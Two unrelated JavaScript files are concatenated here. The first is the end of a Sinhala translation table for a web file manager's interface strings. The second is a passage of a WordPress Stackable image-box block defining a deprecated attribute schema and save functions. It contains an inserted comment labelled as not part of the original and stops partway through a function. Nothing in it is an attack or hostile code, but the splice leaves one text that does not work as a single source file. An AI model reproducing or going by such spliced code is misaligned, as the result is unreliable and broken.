'btnCwd' : 'මෙතන', // from v2.1 added 22.5.2015
'btnVolume' : 'එ්කකය(Volume)', // from v2.1 added 22.5.2015
'btnAll' : 'සියල්ල', // from v2.1 added 22.5.2015
'btnMime' : 'MIME වර්ගය', // from v2.1 added 22.5.2015
'btnFileName':'ගොනුවේ නම', // from v2.1 added 22.5.2015
'btnSaveClose': 'සුරකින්න සහ වසන්න', // from v2.1 added 12.6.2015
'btnBackup' : 'උපස්ථ(Backup) කරන්න', // fromv2.1 added 28.11.2015
'btnRename' : 'නම වෙනස් කරන්න', // from v2.1.24 added 6.4.2017
'btnRenameAll' : 'නම වෙනස් කරන්න(සියල්ල)', // from v2.1.24 added 6.4.2017
'btnPrevious' : 'පෙර ($1/$2)', // from v2.1.24 added 11.5.2017
'btnNext' : 'ඊළඟ ($1/$2)', // from v2.1.24 added 11.5.2017
'btnSaveAs' : 'වෙනත් නමකින් සුරකිමින්(Save As)', // from v2.1.25 added 24.5.2017
/******************************** notifications ********************************/
'ntfopen' : 'ෆෝල්ඩරය විවෘත කරමින්',
'ntffile' : 'ගොනුව විවෘත කරමින්',
'ntfreload' : 'ෆෝල්ඩර් අන්තර්ගතය නැවත අළුත් කරමින්(Reloading)',
'ntfmkdir' : 'ෆෝල්ඩරයක් නිර්මාණය කරමින්',
'ntfmkfile' : 'ගොනුව නිර්මාණය කරමින්',
'ntfrm' : 'අයිතමයන් මකමින්',
'ntfcopy' : 'අයිතමයන් පිටපත් කරමින්',
'ntfmove' : 'අයිතමයන් සම්පූර්ණයෙන් විස්ථාපනය කරමින්',
'ntfprepare' : 'පවතින අයිතම පිරික්සමින්',
'ntfrename' : 'ගොනු නැවත නම් කරමින්',
'ntfupload' : 'ගොනු උඩුගත(uploading) කරමින්',
'ntfdownload' : 'ගොනු බාගත(downloading) කරමින්',
'ntfsave' : 'ගොනු සුරකිමින්',
'ntfarchive' : 'සංරක්ෂණය(archive) සාදමින්',
'ntfextract' : 'සංරක්ෂණයෙන්(archive) ගොනු දිගහරිමින්(Extracting)',
'ntfsearch' : 'ගොනු සොයමින්',
'ntfresize' : 'රූප ප්රමාණය වෙනස් කරමින්',
'ntfsmth' : 'දෙයක් කරමින්',
'ntfloadimg' : 'පින්තූරය පූරණය කරමින්(Loading)',
'ntfnetmount' : 'ජාල එ්කකයක් සවිකරමින්(Mounting network volume)', // added 18.04.2012
'ntfnetunmount': 'ජාල එ්කකයක් ගලවමින්(Unmounting network volume)', // from v2.1 added 30.04.2012
'ntfdim' : 'පිංතූරයේ මානය(dimension) ලබාගනිමින්', // added 20.05.2013
'ntfreaddir' : 'ෆෝල්ඩරයේ තොරතුරු කියවමින්', // from v2.1 added 01.07.2013
'ntfurl' : 'Getting URL of link', // from v2.1 added 11.03.2014
'ntfchmod' : 'ගොනු ආකරය වෙනස් කරමින්', // from v2.1 added 20.6.2015
'ntfpreupload': 'උඩුගත(upload) කරන ලද ගොනු නාමය සත්යාපනය කරමින්(Verifying)', // from v2.1 added 31.11.2015
'ntfzipdl' : 'බාගත කරගැනීම(download) සඳහා ගොනුවක් නිර්මාණය කරමින්', // from v2.1.7 added 23.1.2016
'ntfparents' : 'මාර්ග(path) තොරතුරු ලබා ගනිමින්', // from v2.1.17 added 2.11.2016
'ntfchunkmerge': 'උඩුගත කරන ලද(uploaded) ගොනුව සකසමින්', // from v2.1.17 added 2.11.2016
'ntftrash' : 'කුණු කූඩයට දමමින්', // from v2.1.24 added 2.5.2017
'ntfrestore' : 'කුණු කූඩයට දැමීම යළි පිහිටුවමින්(Doing restore)', // from v2.1.24 added 3.5.2017
'ntfchkdir' : 'ගමනාන්ත(destination) ෆෝල්ඩරය පරීක්ෂා කරමින්', // from v2.1.24 added 3.5.2017
'ntfundo' : 'පෙර මෙහෙයුම(operation) ඉවත් කරමින්', // from v2.1.27 added 31.07.2017
'ntfredo' : 'පෙර ආපසු හැරවීම යළි සැකසමින්', // from v2.1.27 added 31.07.2017
/*********************************** volumes *********************************/
'volume_Trash' : 'කුණු කූඩය', //from v2.1.24 added 29.4.2017
/************************************ dates **********************************/
'dateUnknown' : 'නොදනී',
'Today' : 'අද',
'Yesterday' : 'ඊයේ',
'msJan' : 'ජනවා.',
'msFeb' : 'පෙබ.',
'msMar' : 'මාර්.',
'msApr' : 'අප්රේ.',
'msMay' : 'මැයි',
'msJun' : 'ජූනි',
'msJul' : 'ජුලි',
'msAug' : 'අගෝ.',
'msSep' : 'සැප්.',
'msOct' : 'ඔක්තෝ.',
'msNov' : 'නොවැ.',
'msDec' : 'දෙසැ.',
'January' : 'ජනවාරි',
'February' : 'පෙබරවාරි',
'March' : 'මාර්තු',
'April' : 'අප්රේල්',
'May' : 'මැයි',
'June' : 'ජූනි',
'July' : 'ජුලි',
'August' : 'අගෝස්තු',
'September' : 'සැප්තැම්බර්',
'October' : 'ඔක්තෝම්බර්',
'November' : 'නොවැම්බර්',
'December' : 'දෙසැම්බර්',
'Sunday' : 'ඉරිදා',
'Monday' : 'සඳුදා',
'Tuesday' : 'අඟහරුවාදා',
'Wednesday' : 'බදාදා',
'Thursday' : 'බ්රහස්පතින්දා',
'Friday' : 'සිකුරාදා',
'Saturday' : 'සෙනසුරාදා',
'Sun' : 'ඉරිදා',
'Mon' : 'සඳු.',
'Tue' : 'අඟහ.',
'Wed' : 'බදාදා',
'Thu' : 'බ්රහස්.',
'Fri' : 'සිකු.',
'Sat' : 'සෙන.',
/******************************** sort variants ********************************/
'sortname' : 'නම අනුව',
'sortkind' : 'වර්ගය අනුව',
'sortsize' : 'ප්රමාණය අනුව',
'sortdate' : 'දිනය අනුව',
'sortFoldersFirst' : 'ෆෝල්ඩර වලට පළමු තැන',
'sortperm' : 'අවසරය අනුව', // from v2.1.13 added 13.06.2016
'sortmode' : 'අාකාරය අනුව', // from v2.1.13 added 13.06.2016
'sortowner' : 'හිමිකරු අනුව', // from v2.1.13 added 13.06.2016
'sortgroup' : 'කණ්ඩායම අනුව', // from v2.1.13 added 13.06.2016
'sortAlsoTreeview' : 'එලෙසටම රුක්සටහනත්(Treeview)', // from v2.1.15 added 01.08.2016
/********************************** new items **********************************/
'untitled file.txt' : 'NewFile.txt', // added 10.11.2015
'untitled folder' : 'නව ෆෝල්ඩරයක්', // added 10.11.2015
'Archive' : 'NewArchive', // from v2.1 added 10.11.2015
/********************************** messages **********************************/
'confirmReq' : 'තහවුරු කිරීම අවශ්යයි',
'confirmRm' : 'අයිතමයන් සදහටම ඉවත් කිරීමට අවශ්ය බව ඔබට විශ්වාසද?<br/>මෙය අාපසු හැරවිය නොහැකිය!',
'confirmRepl' : 'පැරණි අයිතමය නව එකක මගින් ප්රතිස්ථාපනය කරන්නද?',
'confirmRest' : 'දැනට පවතින අයිතමය කුණු කූඩය තුළ පවතින අයිතමය මගින් ප්රතිස්ථාපනය කරන්නද?', // fromv2.1.24 added 5.5.2017
'confirmConvUTF8' : 'UTF-8 හි නොවේ<br/> UTF-8 වෙත පරිවර්තනය කරන්න ද?<br/>සුරැකීමෙන් පසු අන්තර්ගතය UTF-8 බවට පරිවර්තනය වේ.', // from v2.1 added 08.04.2014
'confirmNonUTF8' : 'මෙම ගොනුවෙහි කේතන කේත(Character encoding) හඳුනාගත නොහැකි විය. සංස්කරණ කිරීමට එය තාවකාලිකව UTF-8 වෙත පරිවර්තනය කිරීම අවශ්ය වේ.<br/>කරුණාකර මෙම ගොනුවෙහි අක්ෂර කේතන කේත(character encoding) තෝරන්න.', // from v2.1.19 added 28.11.2016
'confirmNotSave' : 'මෙය වෙනස් කර ඇත.<br/>ඔබට වෙනස්කම් සුරැකීමට නොහැකි නම් සිදු කරනු ලැබූ වෙනස්කම් අහිමි වේ.', // from v2.1 added 15.7.2015
'confirmTrash' : 'කුණු කූඩය තුලට අයිතමය යැවීමට ඔබට අවශ්ය ද?', //from v2.1.24 added 29.4.2017
'apllyAll' : 'සියල්ලටම යොදන්න',
'name' : 'නම',
'size' : 'ප්රමාණය',
'perms' : 'අවසරය',
'modify' : 'නවීකරණය කෙරුණ ලද්දේ',
'kind' : 'ජාතිය',
'read' : 'කියවන්න',
'write' : 'ලියන්න',
'noaccess' : 'ප්රවේශයක් නොමැත',
'and' : 'සහ',
'unknown' : 'නොහඳුනයි',
'selectall' : 'සියලු ගොනු තෝරන්න',
'selectfiles' : 'ගොනු(ව) තෝරන්න',
'selectffile' : 'පළමු ගොනුව තෝරන්න',
'selectlfile' : 'අවසාන ගොනුව තෝරන්න',
'viewlist' : 'ලැයිස්තු අාකාරය',
'viewicons' : 'අයිකන අාකාරය',
'places' : 'Places',
'calc' : 'ගණනය කරන්න',
'path' : 'මාර්ගය',
'aliasfor' : 'Alias for',
'locked' : 'අගුළු දමා ඇත',
'dim' : 'මාන(Dimensions)',
'files' : 'ගොනු',
'folders' : 'ෆෝල්ඩර',
'items' : 'අයිතම(Items)',
'yes' : 'ඔව්',
'no' : 'නැත',
'link' : 'සබැඳිය(Link)',
'searcresult' : 'සෙවුම් ප්රතිඵල',
'selected' : 'තෝරාගත් අයිතම',
'about' : 'මේ ගැන',
'shortcuts' : 'කෙටිමං',
'help' : 'උදව්',
'webfm' : 'වෙබ් ගොනු කළමනාකරු',
'ver' : 'අනුවාදය(version)',
'protocolver' : 'ප්රොටොකෝලය අනුවාදය(protocol version)',
'homepage' : 'ව්යාපෘතිය නිවහන',
'docs' : 'ලේඛනගත කිරීම',
'github' : 'Github හරහා සංවාදයේ යෙදෙන්න',
'twitter' : 'Twitter හරහා අපව සම්බන්ධ වන්න',
'facebook' : 'Facebook හරහා අප සමඟ එකතු වන්න',
'team' : 'කණ්ඩායම',
'chiefdev' : 'ප්රධාන සංස්කරු(chief developer)',
'developer' : 'සංස්කරු(developer)',
'contributor' : 'දායකයා(contributor)',
'maintainer' : 'නඩත්තු කරන්නා(maintainer)',
'translator' : 'පරිවර්තකයා',
'icons' : 'අයිකන',
'dontforget' : 'and don\'t forget to take your towel',
'shortcutsof' : 'කෙටිමං අක්රීය කර ඇත',
'dropFiles' : 'ගොනු මෙතැනට ඇද දමන්න',
'or' : 'හෝ',
'selectForUpload' : 'ගොනු තෝරන්න',
'moveFiles' : 'අායිත්තම සම්පූර්ණයෙන් විස්ථාපනය',
'copyFiles' : 'අයිතමයන් පිටපත් කරන්න',
'restoreFiles' : 'Restore items', // from v2.1.24 added 5.5.2017
'rmFromPlaces' : 'Remove from places',
'aspectRatio' : 'දර්ශන අනුපාතය(Aspect ratio)',
'scale' : 'පරිමාණය',
'width' : 'පළල',
'height' : 'උස',
'resize' : 'ප්රතිප්රමානණය',
'crop' : 'Crop',
'rotate' : 'කැරකැවීම',
'rotate-cw' : 'අංශක 90කින් කරකවන්න CW',
'rotate-ccw' : 'අංශක 90කින් කරකවන්න CCW',
'degree' : '°',
'netMountDialogTitle' : 'Mount network volume', // added 18.04.2012
'protocol' : 'Protocol', // added 18.04.2012
'host' : 'Host', // added 18.04.2012
'port' : 'Port', // added 18.04.2012
'user' : 'පරිශීලක', // added 18.04.2012
'pass' : 'මුරපදය', // added 18.04.2012
'confirmUnmount' : 'Are you sure you want to unmount $1?', // from v2.1 added 30.04.2012
'dropFilesBrowser': 'Drop or Paste files from browser', // from v2.1 added 30.05.2012
'dropPasteFiles' : 'Drop files, Paste URLs or images(clipboard) here', // from v2.1 added 07.04.2014
'encoding' : 'කේතීකරණය(Encoding)', // from v2.1 added 19.12.2014
'locale' : 'Locale', // from v2.1 added 19.12.2014
'searchTarget' : 'ඉලක්කය: $1', // from v2.1 added 22.5.2015
'searchMime' : 'Search by input MIME Type', // from v2.1 added 22.5.2015
'owner' : 'හිමිකරු', // from v2.1 added 20.6.2015
'group' : 'සමූහය', // from v2.1 added 20.6.2015
'other' : 'වෙනත්', // from v2.1 added 20.6.2015
'execute' : 'ක්රයාත්මක කරන්න', // from v2.1 added 20.6.2015
'perm' : 'අවසරය', // from v2.1 added 20.6.2015
'mode' : 'Mode', // from v2.1 added 20.6.2015
'emptyFolder' : 'ෆෝල්ඩරය හිස්', // from v2.1.6 added 30.12.2015
'emptyFolderDrop' : 'ෆාේල්ඩරය හිස්\\A අායිත්තම අතහැරීමෙන් අැතුලු කරන්න', // from v2.1.6 added 30.12.2015
'emptyFolderLTap' : 'ෆාේල්ඩරය හිස්\\A දිර්ඝ එබීමෙන් අායිත්තම අැතුලු කරන්න', // from v2.1.6 added 30.12.2015
'quality' : 'ගුණාත්මකභාවය', // from v2.1.6 added 5.1.2016
'autoSync' : 'Auto sync', // from v2.1.6 added 10.1.2016
'moveUp' : 'Move up', // from v2.1.6 added 18.1.2016
'getLink' : 'Get URL link', // from v2.1.7 added 9.2.2016
'selectedItems' : 'තෝරාගත් අයිතම ($1)', // from v2.1.7 added 2.19.2016
'folderId' : 'Folder ID', // from v2.1.10 added 3.25.2016
'offlineAccess' : 'Allow offline access', // from v2.1.10 added 3.25.2016
'reAuth' : 'To re-authenticate', // from v2.1.10 added 3.25.2016
'nowLoading' : 'Now loading...', // from v2.1.12 added 4.26.2016
'openMulti' : 'බහු ගොනු විවෘත කරන්න', // from v2.1.12 added 5.14.2016
'openMultiConfirm': 'ඔබ $1 ගොනු විවෘත කිරීමට උත්සාහ කරයි. බ්රව්සරයෙන් ඔබට විවෘත කිරීමට අවශ්ය බව ඔබට විශ්වාසද?', // from v2.1.12 added 5.14.2016
'emptySearch' : 'සෙවුම් ඉලක්කයේ ගවේෂණ ප්රතිඵල නොමැත.', // from v2.1.12 added 5.16.2016
'editingFile' : 'එය ගොනුව සංස්කරණය කිරීමකි.', // from v2.1.13 added 6.3.2016
'hasSelected' : 'ඔබ අයිතම $1 ප්රමාණයක් තෝරාගෙන ඇත.', // from v2.1.13 added 6.3.2016
'hasClipboard' : 'You have $1 items in the clipboard.', // from v2.1.13 added 6.3.2016
'incSearchOnly' : 'Incremental search is only from the current view.', // from v2.1.13 added 6.30.2016
'reinstate' : 'යථා තත්ත්වයට පත් කරන්න', // from v2.1.15 added 3.8.2016
'complete' : '$1 සම්පූර්ණයි', // from v2.1.15 added 21.8.2016
'contextmenu' : 'Context menu', // from v2.1.15 added 9.9.2016
'pageTurning' : 'Page turning', // from v2.1.15 added 10.9.2016
'volumeRoots' : 'Volume roots', // from v2.1.16 added 16.9.2016
'reset' : 'යළි පිහිටුවන්න(Reset)', // from v2.1.16 added 1.10.2016
'bgcolor' : 'පසුබිම් වර්ණය', // from v2.1.16 added 1.10.2016
'colorPicker' : 'Color picker', // from v2.1.16 added 1.10.2016
'8pxgrid' : 'පික්සල් 8ක දැල', // from v2.1.16 added 4.10.2016
'enabled' : 'සක්රීයයි', // from v2.1.16 added 4.10.2016
'disabled' : 'අක්රීයයි', // from v2.1.16 added 4.10.2016
'emptyIncSearch' : 'වර්තමාන දර්ශනය තුළ සෙවුම් ප්රතිපල හිස්ව ඇත. \\A සෙවුම් ඉලක්කය පුළුල් කිරීම සඳහා [Enter] යතුර ඔබන්න.', // from v2.1.16 added 5.10.2016
'emptyLetSearch' : 'වර්තමාන දර්ශනයේ පළමු අකුර සෙවුම් ප්රතිපල හිස්ව පවතී.', // from v2.1.23 added 24.3.2017
'textLabel' : 'ලේබල්වල නම්', // from v2.1.17 added 13.10.2016
'minsLeft' : 'විනාඩි $1 ක් ගතවේ', // from v2.1.17 added 13.11.2016
'openAsEncoding' : 'Reopen with selected encoding', // from v2.1.19 added 2.12.2016
'saveAsEncoding' : 'Save with the selected encoding', // from v2.1.19 added 2.12.2016
'selectFolder' : 'ෆෝල්ඩරය තෝරන්න', // from v2.1.20 added 13.12.2016
'firstLetterSearch': 'පළමු අකුරෙන් සෙවීම', // from v2.1.23 added 24.3.2017
'presets' : 'Presets', // from v2.1.25 added 26.5.2017
'tooManyToTrash' : 'There are too many items, so they can\'t be moved to the trash.', // from v2.1.25 added 9.6.2017
'TextArea' : 'TextArea', // from v2.1.25 added 14.6.2017
'folderToEmpty' : 'Empty the folder "$1".', // from v2.1.25 added 22.6.2017
'filderIsEmpty' : 'There are no items in the folder "$1".', // from v2.1.25 added 22.6.2017
'preference' : 'Preference', // from v2.1.26 added 28.6.2017
'language' : 'Language setting', // from v2.1.26 added 28.6.2017
'clearBrowserData': 'Initialize the settings saved in this browser', // from v2.1.26 added 28.6.2017
'toolbarPref' : 'Toolbar setting', // from v2.1.27 added 2.8.2017
'charsLeft' : '... $1 ක් අකුරු ඉතිරිව පවතී', // from v2.1.29 added 30.8.2017
'sum' : 'එකතුව', // from v2.1.29 added 28.9.2017
'roughFileSize' : 'Rough file size', // from v2.1.30 added 2.11.2017
'autoFocusDialog' : 'Focus on the element of dialog with mouseover', // from v2.1.30 added 2.11.2017
'select' : 'තෝරන්න', // from v2.1.30 added 23.11.2017
'selectAction' : 'ගොනුවක් තේරූ විට සිදුකල යුතු දේ', // from v2.1.30 added 23.11.2017
'useStoredEditor' : 'Open with the editor used last time', // from v2.1.30 added 23.11.2017
'selectinvert' : 'ප්රතිවිරුද්ධ අාකාරයට තෝරන්න', // from v2.1.30 added 25.11.2017
'renameMultiple' : 'Are you sure you want to rename $1 selected items like $2?<br/>This cannot be undone!', // from v2.1.31 added 4.12.2017
'batchRename' : 'Batch rename', // from v2.1.31 added 8.12.2017
'plusNumber' : '+ Number', // from v2.1.31 added 8.12.2017
'asPrefix' : 'Add prefix', // from v2.1.31 added 8.12.2017
'asSuffix' : 'Add suffix', // from v2.1.31 added 8.12.2017
'changeExtention' : 'Change extension', // from v2.1.31 added 8.12.2017
'columnPref' : 'Columns settings (List view)', // from v2.1.32 added 6.2.2018
'reflectOnImmediate' : 'All changes will reflect immediately to the archive.', // from v2.1.33 added 2.3.2018
'reflectOnUnmount' : 'Any changes will not reflect until un-mount this volume.', // from v2.1.33 added 2.3.2018
'unmountChildren' : 'The following volume(s) mounted on this volume will also be unmounted. Are you sure you want to unmount them?', // from v2.1.33 added 5.3.2018
'selectionInfo' : 'තෝරාගැනීම්වල තොරතුරු', // from v2.1.33 added 7.3.2018
'hashChecker' : 'Algorithms to show the file hash', // from v2.1.33 added 10.3.2018
/********************************** mimetypes **********************************/
'kindUnknown' : 'නොදන්නා',
'kindRoot' : 'Volume Root', // from v2.1.16 added 16.10.2016
'kindFolder' : 'ෆෝල්ඩරය',
'kindSelects' : 'තේරීම්', // from v2.1.29 added 29.8.2017
'kindAlias' : 'Alias',
'kindAliasBroken' : 'Broken alias',
// applications
'kindApp' : 'Application',
'kindPostscript' : 'Postscript ලේඛනය',
'kindMsOffice' : 'Microsoft Office ලේඛනය',
'kindMsWord' : 'Microsoft Word ලේඛනය',
'kindMsExcel' : 'Microsoft Excel ලේඛනය',
'kindMsPP' : 'Microsoft Powerpoint presentation',
'kindOO' : 'Open Office ලේඛනය',
'kindAppFlash' : 'Flash application',
'kindPDF' : 'Portable Document Format (PDF)',
'kindTorrent' : 'Bittorrent file',
'kind7z' : '7z archive',
'kindTAR' : 'TAR archive',
'kindGZIP' : 'GZIP archive',
'kindBZIP' : 'BZIP archive',
'kindXZ' : 'XZ archive',
'kindZIP' : 'ZIP archive',
'kindRAR' : 'RAR archive',
'kindJAR' : 'Java JAR file',
'kindTTF' : 'True Type font',
'kindOTF' : 'Open Type font',
'kindRPM' : 'RPM package',
// texts
'kindText' : 'Text ලේඛනය',
'kindTextPlain' : 'Plain text',
'kindPHP' : 'PHP මූලාශ්රය',
'kindCSS' : 'Cascading style sheet',
'kindHTML' : 'HTML ලේඛනය',
'kindJS' : 'Javascript මූලාශ්රය',
'kindRTF' : 'Rich Text Format',
'kindC' : 'C මූලාශ්රය',
'kindCHeader' : 'C header මූලාශ්රය',
'kindCPP' : 'C++ මූලාශ්රය',
'kindCPPHeader' : 'C++ header මූලාශ්රය',
'kindShell' : 'Unix shell රචනයකි',
'kindPython' : 'Python මූලාශ්රය',
'kindJava' : 'Java මූලාශ්රය',
'kindRuby' : 'Ruby මූලාශ්රය',
'kindPerl' : 'Perl රචනයකි',
'kindSQL' : 'SQL මූලාශ්රය',
'kindXML' : 'XML ලේඛනය',
'kindAWK' : 'AWK මූලාශ්රය',
'kindCSV' : 'කොමාවන් වෙන් කළ අගයන්',
'kindDOCBOOK' : 'Docbook XML ලේඛනය',
'kindMarkdown' : 'Markdown text', // added 20.7.2015
// images
'kindImage' : 'පින්තූරය',
'kindBMP' : 'BMP පින්තූරය',
'kindJPEG' : 'JPEG පින්තූරය',
'kindGIF' : 'GIF පින්තූරය',
'kindPNG' : 'PNG පින්තූරය',
'kindTIFF' : 'TIFF පින්තූරය',
'kindTGA' : 'TGA පින්තූරය',
'kindPSD' : 'Adobe Photoshop පින්තූරය',
'kindXBITMAP' : 'X bitmap පින්තූරය',
'kindPXM' : 'Pixelmator පින්තූරය',
// media
'kindAudio' : 'ශබ්ධ මාධ්ය',
'kindAudioMPEG' : 'MPEG ශබ්ධපටය',
'kindAudioMPEG4' : 'MPEG-4 ශබ්ධපටය',
'kindAudioMIDI' : 'MIDI ශබ්ධපටය',
'kindAudioOGG' : 'Ogg Vorbis ශබ්ධපටය',
'kindAudioWAV' : 'WAV ශබ්ධපටය',
'AudioPlaylist' : 'MP3 playlist',
'kindVideo' : 'Video මාධ්ය',
'kindVideoDV' : 'DV චිත්රපටය',
'kindVideoMPEG' : 'MPEG චිත්රපටය',
'kindVideoMPEG4' : 'MPEG-4 චිත්රපටය',
'kindVideoAVI' : 'AVI චිත්රපටය',
'kindVideoMOV' : 'Quick Time චිත්රපටය',
'kindVideoWM' : 'Windows Media චිත්රපටය',
'kindVideoFlash' : 'Flash චිත්රපටය',
'kindVideoMKV' : 'Matroska චිත්රපටය',
'kindVideoOGG' : 'Ogg චිත්රපටය'
}
};
}));
/**
* Internal dependencies
*/
import SVGArrow from './images/arrow.svg'
/**
* External dependencies
*/
import { range } from '~stackable/util'
import classnames from 'classnames'
import { i18n } from 'stackable'
/**
* WordPress dependencies
*/
import { __ } from '@wordpress/i18n'
import { applyFilters } from '@wordpress/hooks'
import { RichText } from '@wordpress/block-editor'
const deprecatedSchema_1_17_3 = {
align: {
type: 'string',
},
columns: {
type: 'number',
default: 3,
},
titleColor: {
type: 'string',
default: '#ffffff',
},
subtitleColor: {
type: 'string',
default: '#ffffff',
},
overlayColor: {
type: 'string',
},
width: {
type: 'number',
default: 400,
},
height: {
type: 'number',
default: 400,
},
verticalAlign: {
type: 'string',
default: 'center',
},
horizontalAlign: {
type: 'string',
default: 'center',
},
design: {
type: 'string',
default: 'basic',
},
borderRadius: {
type: 'number',
default: 12,
},
shadow: {
type: 'number',
default: 3,
},
overlayOpacity: {
type: 'number',
default: 7,
},
imageHoverEffect: {
type: 'string',
default: '',
},
arrow: {
type: 'string',
default: '',
},
hoverEffect: {
type: 'string',
default: '',
},
// Keep the old attributes. Gutenberg issue https://github.com/WordPress/gutenberg/issues/10406
full: {
type: 'boolean',
},
title: {
type: 'string',
},
subtitle: {
type: 'string',
},
id: {
type: 'number',
},
url: {
type: 'string',
},
href: {
type: 'string',
},
// Custom CSS attributes.
customCSSUniqueID: {
type: 'string',
default: '',
},
customCSS: {
type: 'string',
default: '',
},
customCSSCompiled: {
type: 'string',
default: '',
},
}
// Wrap in curly braces, or else the statement will merge with the previous one and error out.
{ [ 1, 2, 3, 4 ].forEach( i => {
deprecatedSchema_1_17_3[ `title${ i }` ] = {
source: 'html',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__title`,
default: __( 'Title', i18n ),
}
deprecatedSchema_1_17_3[ `description${ i }` ] = {
source: 'html',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__description`,
default: __( 'Description', i18n ),
}
deprecatedSchema_1_17_3[ `imageURL${ i }` ] = {
type: 'string',
}
deprecatedSchema_1_17_3[ `imageID${ i }` ] = {
type: 'number',
}
deprecatedSchema_1_17_3[ `link${ i }` ] = {
type: 'string',
source: 'attribute',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__overlay`,
attribute: 'href',
default: '',
}
deprecatedSchema_1_17_3[ `newTab${ i }` ] = {
type: 'boolean',
source: 'attribute',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__overlay`,
attribute: 'target',
default: false,
}
} ) }
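// Descriptive note (not part of the original source): the loop above generates
// per-column attributes title1..title4, description1..description4,
// imageURL1..4, imageID1..4, link1..4 and newTab1..4, which migrate_1_17_3
// below maps onto the newer attribute names.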
const deprecatedSave_1_17_3 = props => {
const { className, attributes } = props
const {
titleColor,
subtitleColor,
overlayColor,
height,
width,
verticalAlign,
horizontalAlign,
align,
columns,
design = 'basic',
borderRadius = 12,
shadow = 3,
imageHoverEffect = '',
overlayOpacity = 7,
arrow = '',
} = props.attributes
const mainClasses = classnames( [
className,
'ugb-image-box',
'ugb-image-box--v3',
`ugb-image-box--columns-${ columns }`,
], applyFilters( 'stackable.image-box.mainclasses_1_17_3', {
[ `ugb-image-box--design-${ design }` ]: design !== 'basic',
[ `ugb-image-box--effect-${ imageHoverEffect }` ]: imageHoverEffect,
[ `ugb-image-box--overlay-${ overlayOpacity }` ]: overlayOpacity !== 7,
'ugb-image-box--arrow': arrow,
}, design, props ) )
const mainStyles = {
textAlign: horizontalAlign ? horizontalAlign : undefined,
'--overlay-color': overlayColor,
}
return (
<div className={ mainClasses } style={ mainStyles }>
{ applyFilters( 'stackable.image-box.save.output.before_1_17_3', null, design, props ) }
{ range( 1, columns + 1 ).map( i => {
const imageURL = attributes[ `imageURL${ i }` ]
const title = attributes[ `title${ i }` ]
const description = attributes[ `description${ i }` ]
const link = attributes[ `link${ i }` ]
const newTab = attributes[ `newTab${ i }` ]
const boxStyles = {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
maxWidth: align !== 'wide' && align !== 'full' && columns === 1 ? width : undefined,
height,
textAlign: horizontalAlign,
justifyContent: verticalAlign,
borderRadius,
}
const boxClasses = classnames( [
'ugb-image-box__item',
], applyFilters( 'stackable.image-box.itemclasses_1_17_3', {
[ `ugb--shadow-${ shadow }` ]: shadow !== 3,
}, design, i, props ) )
const arrowClasses = classnames( [
'ugb-image-box__arrow',
`ugb-image-box__arrow--align-${ arrow }`,
] )
return (
<div className={ boxClasses } style={ boxStyles } key={ i }>
{ imageHoverEffect && <div
className="ugb-image-box__image-effect"
style={ {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
} } />
}
{ /* eslint-disable-next-line */ }
<a
className="ugb-image-box__overlay"
href={ link }
target={ newTab ? '_blank' : undefined }
/>
<div className="ugb-image-box__content">
{ ! RichText.isEmpty( title ) && (
<RichText.Content
tagName="h4"
className="ugb-image-box__title"
style={ { color: titleColor } }
value={ title }
/>
) }
{ ! RichText.isEmpty( description ) && (
<RichText.Content
tagName="p"
className="ugb-image-box__description"
style={ { color: subtitleColor } }
value={ description }
/>
) }
</div>
{ arrow && link && (
<div className={ arrowClasses }>
<SVGArrow style={ { fill: titleColor ? titleColor : undefined } } />
</div>
) }
</div>
)
} ) }
{ applyFilters( 'stackable.image-box.save.output.after_1_17_3', null, design, props ) }
</div>
)
}
const deprecatedSave_1_17_3_ = ( hasTitleStyle = true, hasDescriptionStyle = true ) => props => {
const { className, attributes } = props
const {
titleColor,
subtitleColor,
overlayColor,
height,
width,
verticalAlign,
horizontalAlign,
align,
columns,
design = 'basic',
borderRadius = 12,
shadow = 3,
imageHoverEffect = '',
overlayOpacity = 7,
arrow = '',
} = props.attributes
const mainClasses = classnames( [
className,
'ugb-image-box',
'ugb-image-box--v3',
`ugb-image-box--columns-${ columns }`,
], applyFilters( 'stackable.image-box.mainclasses_1_17_3', {
[ `ugb-image-box--design-${ design }` ]: design !== 'basic',
[ `ugb-image-box--effect-${ imageHoverEffect }` ]: imageHoverEffect,
[ `ugb-image-box--overlay-${ overlayOpacity }` ]: overlayOpacity !== 7,
'ugb-image-box--arrow': arrow,
}, design, props ) )
const mainStyles = {
textAlign: horizontalAlign ? horizontalAlign : undefined,
'--overlay-color': overlayColor,
}
return (
<div className={ mainClasses } style={ mainStyles }>
{ applyFilters( 'stackable.image-box.save.output.before_1_17_3', null, design, props ) }
{ range( 1, columns + 1 ).map( i => {
const imageURL = attributes[ `imageURL${ i }` ]
const title = attributes[ `title${ i }` ]
const description = attributes[ `description${ i }` ]
const link = attributes[ `link${ i }` ]
const newTab = attributes[ `newTab${ i }` ]
const boxStyles = {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
maxWidth: align !== 'wide' && align !== 'full' && columns === 1 ? width : undefined,
height,
textAlign: horizontalAlign,
justifyContent: verticalAlign,
borderRadius,
}
const boxClasses = classnames( [
'ugb-image-box__item',
], applyFilters( 'stackable.image-box.itemclasses_1_17_3', {
[ `ugb--shadow-${ shadow }` ]: shadow !== 3,
}, design, i, props ) )
const arrowClasses = classnames( [
'ugb-image-box__arrow',
`ugb-image-box__arrow--align-${ arrow }`,
] )
return (
<div className={ boxClasses } style={ boxStyles } key={ i }>
{ imageHoverEffect && <div
className="ugb-image-box__image-effect"
style={ {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
} } />
}
{ /* eslint-disable-next-line */ }
<a
className="ugb-image-box__overlay"
href={ link }
target={ newTab ? '_blank' : undefined }
/>
<div className="ugb-image-box__content">
{ ! RichText.isEmpty( title ) && (
<RichText.Content
tagName="h4"
className="ugb-image-box__title"
style={ hasTitleStyle ? { color: titleColor } : undefined }
value={ title }
/>
) }
{ ! RichText.isEmpty( description ) && (
<RichText.Content
tagName="p"
className="ugb-image-box__description"
style={ hasDescriptionStyle ? { color: subtitleColor } : undefined }
value={ description }
/>
) }
</div>
{ arrow && link && (
<div className={ arrowClasses }>
<SVGArrow style={ { fill: titleColor ? titleColor : undefined } } />
</div>
) }
</div>
)
} ) }
